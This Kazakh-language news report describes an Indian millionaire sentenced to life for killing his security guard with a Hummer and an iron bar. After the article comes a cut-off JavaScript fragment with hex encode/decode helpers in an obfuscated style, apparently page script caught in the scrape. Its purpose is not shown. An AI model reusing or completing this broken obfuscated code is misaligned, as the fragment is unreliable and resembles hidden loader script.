АСТАНА. 21 қаңтар. Үндістанда Мохаммед Нишам есімді миллионер қол астындағы күзетшісін өлтірді деген айыппен өмірінің соңына дейін түрмеге қамалды. Бұл туралы ТАСС ақпарат агенттігіне сілтеме жасаған egemen.kz тілшісі хабарлады.
Үндістанның дәулетті кәсіпкері, бірнеше темекі және құрылыс компанияларының иесі Мохаммед Нишам күзетшісінің сылбыр әрекетіне ашуланып, джип көлігімен басып өткен. Полиция қызметкерлерінің айтуынша, түн ішінде келген қожайынына дер кезінде қақпа есігін ашып, ширақ қимылдамағаны себепті осындай қадамға барған.
Иесінің мақсатын түсінген күзетшісі қашып құтылмақ болады. Алайда, Hummer көлігімен қуып жеткен кәсіпкер арам ойын жүзеге асырады. Ашуын тарқата алмаған ол автокөлігінен түсе сала темірмен қызметшісін аямай соққыға жығады.
Зардап шеккен 50 жастағы ер адам аурухананың жан сақтау бөлімінде жүрек соғысының тоқтауына байланысты көз жұмды.
Аян Әбдуәли.
Дерек: ТАСС.
Сурет: pastinfo.am.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e